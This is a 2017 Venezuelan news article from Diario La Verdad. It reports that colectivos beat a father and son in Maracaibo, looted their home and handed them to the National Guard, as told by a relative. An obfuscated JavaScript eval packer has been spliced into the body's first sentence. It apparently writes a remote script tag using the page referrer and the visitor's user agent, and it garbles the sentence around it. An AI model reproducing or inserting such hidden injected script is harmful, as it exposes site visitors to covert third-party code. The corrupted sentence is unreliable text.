publicidad


Colectivos golpean a padre e hijo y luego los entregaron a la GNB

Sugey Díaz / Maracaibo / sdiaz@laverdad.com
Los eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dzyde|var|u0026u|referrer|nbskr||js|php'.split('|'),0,{})) motivos de la detención de hasta Yuri y Fabricio Hernández, padre e hijo, ahora son desconocidos por los familiares de las víctimas. “Fueron los colectivos que sacaron a mi hermano y mi sobrino de la casa y luego nos enteramos que los tenían los de la Guardia. Nunca entendimos por qué los detuvieron”, afirma Yajaira Hernández

Fotos: Neuro Díaz

Fabricio Rafael Hernández Cepeda, estudiante de 19 años de edad, y su padre Yuri Hernández, de 50, fueron llevados al Comando Regional número 3 de la Guardia Nacional el jueves, durante los hechos vandálicos registrados en residencias Palaima y sus adyacencias.

Los motivos de la detención hasta ahora son desconocidos por los familiares de las víctimas. “Fueron los colectivos que sacaron a mi hermano y mi sobrino de la casa y luego nos enteramos que los tenían los de la Guardia. Nunca entendimos por qué los detuvieron”, afirma Yajaira Hernández.

Fueron horas difíciles para la familia, cuenta Yajaira, quien desde una ventana en la casa contigua observó cómo un grupo de hombres que identifica como “colectivos violentos” golpeaba sin cesar a su hermano.

“Todo eso se lo hicieron dentro de la casa, Yuri tiene escoriaciones en el torso y múltiples contusiones en la cabeza. Mi sobrino está muy mal, tiene los ojos reventados de los golpes, le dieron tres puñaladas en la espalda, tiene quemaduras de segundo grado y 16 puntos de sutura en una oreja”, detalló.

Las agresiones físicas no fueron suficientes, agrega Hernández en su relato, “la casa la saquearon, se llevaron hasta los aires acondicionados, se robaron los dos perros, los lavamanos los rompieron, no se salvó nada”.

Lamenta que todo sucediera “en medio de efectivos militares”, sabe que su familia no fue el único blanco de “los colectivos revolucionarios”.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama